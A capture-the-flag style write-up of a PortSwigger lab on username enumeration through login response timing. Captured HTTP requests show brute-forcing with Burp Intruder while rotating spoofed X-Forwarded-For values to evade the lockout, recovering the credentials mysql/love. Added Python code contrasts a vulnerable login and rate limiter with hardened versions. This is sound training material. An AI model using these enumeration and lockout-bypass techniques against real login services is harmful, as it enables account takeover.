
Username enumeration via response timing

Solution

Open the website: https://0abd008c04878b31819439f0003f006d.web-security-academy.net/login

Brute-force login and password - Intruder

Wordlists from here --> https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-response-timing
---
┌──(kali㉿kali)-[~/Desktop/writeups/PortSwigger/Port_Swigger_Username enumeration via response timing]
└─$ head -n2 *.txt
==> pass.txt <==
123456
password

==> user.txt <==
carlos
root

Log in to the website - fake user and password

I use a fake login and password
U: admin
P: fakepass

158ms response
---
POST /login HTTP/2
Host: 0a8a004604c296688102d546007200cf.web-security-academy.net
Cookie: session=mdO0pz3CtQwaZ2v79bI0UCRhPYZhX0zE
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
Origin: https://0a8a004604c296688102d546007200cf.web-security-academy.net
Referer: https://0a8a004604c296688102d546007200cf.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

username=admin&password=fakepass

Log in to the website - correct user and password

I use a fake login and password
U: wiener
P: peter

144ms response
---
POST /login HTTP/2
Host: 0a4600d4042471c980673a7400a600cb.web-security-academy.net
Cookie: session=0N6B2MoaM9ccbgebVd767mRPZlrnYEKd
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Origin: https://0a4600d4042471c980673a7400a600cb.web-security-academy.net
Referer: https://0a4600d4042471c980673a7400a600cb.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

username=wiener&password=peter
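The two requests above differ by only a few milliseconds, which is the whole signal the lab relies on: the server hashes the submitted password only when the username exists, so a long password makes a valid username visibly slower. The following is an added example (not the lab's code) of the vulnerable pattern beside a hardened version that hashes against a dummy record for unknown users and rejects oversized passwords before any hashing. The user store, iteration count and `HASH_CALLS` counter are constructed for the demonstration.

```python
import hashlib
import hmac
import os
from typing import Callable, Dict, Tuple

ITERATIONS = 50_000          # PBKDF2 work factor (constructed value)
MAX_PASSWORD_LEN = 128       # reject absurd lengths before doing any hashing
HASH_CALLS = {"count": 0}    # instrumentation: how much hash work a request triggered


def _hash(password: str, salt: bytes) -> bytes:
    HASH_CALLS["count"] += 1
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def make_user(password: str) -> Tuple[bytes, bytes]:
    salt = os.urandom(16)
    return salt, _hash(password, salt)


# Constructed user store: the lab's known-good account only.
USERS: Dict[str, Tuple[bytes, bytes]] = {"wiener": make_user("peter")}
# Dummy credential whose only job is to cost the same as a real lookup.
DUMMY_SALT, DUMMY_HASH = make_user("dummy-never-accepted")


def login_vulnerable(username: str, password: str) -> bool:
    rec = USERS.get(username)
    if rec is None:
        return False            # early return: no hashing, so unknown users answer faster
    salt, stored = rec
    return hmac.compare_digest(_hash(password, salt), stored)


def login_hardened(username: str, password: str) -> bool:
    # Length check depends on the password only, so it leaks nothing about the username.
    if len(password) > MAX_PASSWORD_LEN:
        return False
    # Unknown usernames are hashed against the dummy record: same work, same timing.
    salt, stored = USERS.get(username, (DUMMY_SALT, DUMMY_HASH))
    matched = hmac.compare_digest(_hash(password, salt), stored)
    return matched and username in USERS   # a dummy match must never log anyone in


def hash_calls_for(login: Callable[[str, str], bool], username: str, password: str) -> int:
    """Return how many PBKDF2 computations one login attempt caused."""
    before = HASH_CALLS["count"]
    login(username, password)
    return HASH_CALLS["count"] - before
```

`hash_calls_for` makes the timing side channel countable: the vulnerable function does zero hashing for an unknown user and one hash for a known one, while the hardened function always does exactly one.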

Brute-force login and password

Add 2 payloads:
Payload 1 = numbers from 1 to 100 in the X-Forwarded-For header
Payload 2 = simple list of usernames in the username parameter
---
POST /login HTTP/2
Host: 0a4600d4042471c980673a7400a600cb.web-security-academy.net
Cookie: session=0N6B2MoaM9ccbgebVd767mRPZlrnYEKd
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Origin: https://0a4600d4042471c980673a7400a600cb.web-security-academy.net
Referer: https://0a4600d4042471c980673a7400a600cb.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
X-Forwarded-For: 8
Connection: keep-alive

username=mysql&password=fakepasswordfakepasswordfakepasswordfakepasswordfakepasswordfakepasswordfakepassword

Brute-force login and password - second attempt

Edit the second payload

Payload 1 = numbers from 1 to 100 in the X-Forwarded-For header
Payload 2 = simple list of passwords in the password parameter
---
POST /login HTTP/2
Host: 0a4600d4042471c980673a7400a600cb.web-security-academy.net
Cookie: session=0N6B2MoaM9ccbgebVd767mRPZlrnYEKd
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
Origin: https://0a4600d4042471c980673a7400a600cb.web-security-academy.net
Referer: https://0a4600d4042471c980673a7400a600cb.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
X-Forwarded-For: 80
Connection: keep-alive

username=mysql&password=love
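The X-Forwarded-For payload works because the lab's lockout counter is keyed on that client-supplied header, so every request lands in a fresh bucket. The following is an added example (not the lab's code) of a failed-login limiter in both forms: keyed on the raw header as the lab does, and keyed on the TCP peer address, honouring X-Forwarded-For only when the peer is a configured trusted proxy. The threshold, peer addresses and proxy address are constructed values.

```python
from collections import defaultdict
from typing import Dict, FrozenSet, Mapping

LIMIT = 5  # failed attempts allowed per key before further attempts are refused


class LoginRateLimiter:
    def __init__(self, trust_forwarded_for: bool,
                 trusted_proxies: FrozenSet[str] = frozenset()) -> None:
        self.trust_forwarded_for = trust_forwarded_for
        self.trusted_proxies = trusted_proxies
        self.failures: Dict[str, int] = defaultdict(int)

    def client_key(self, peer_ip: str, headers: Mapping[str, str]) -> str:
        xff = headers.get("X-Forwarded-For")
        if self.trust_forwarded_for and xff:
            # Vulnerable: the header is attacker-controlled, one new bucket per request.
            return xff.strip()
        if xff and peer_ip in self.trusted_proxies:
            # Hardened: only the address our own proxy appended (the last hop) is used.
            return xff.split(",")[-1].strip()
        return peer_ip   # no trusted proxy in front of us: use the real socket address

    def allow(self, peer_ip: str, headers: Mapping[str, str]) -> bool:
        return self.failures[self.client_key(peer_ip, headers)] < LIMIT

    def record_failure(self, peer_ip: str, headers: Mapping[str, str]) -> None:
        self.failures[self.client_key(peer_ip, headers)] += 1


def replay_failed_logins(limiter: LoginRateLimiter, attempts: int) -> int:
    """Replay `attempts` failed logins from one constructed peer, each carrying a
    different X-Forwarded-For value as the Intruder payload above does, and return
    how many the limiter still let through."""
    peer = "203.0.113.10"
    allowed = 0
    for i in range(1, attempts + 1):
        headers = {"X-Forwarded-For": str(i)}
        if limiter.allow(peer, headers):
            allowed += 1
            limiter.record_failure(peer, headers)
    return allowed
```

With 100 attempts the header-keyed limiter admits all 100, while the peer-keyed one admits exactly `LIMIT` before refusing the rest.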

Log in as username mysql with the recovered password

U: mysql
P: love
---
POST /login HTTP/2
Host: 0a4600d4042471c980673a7400a600cb.web-security-academy.net
Cookie: session=0N6B2MoaM9ccbgebVd767mRPZlrnYEKd
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
Origin: https://0a4600d4042471c980673a7400a600cb.web-security-academy.net
Referer: https://0a4600d4042471c980673a7400a600cb.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

username=mysql&password=love

Solved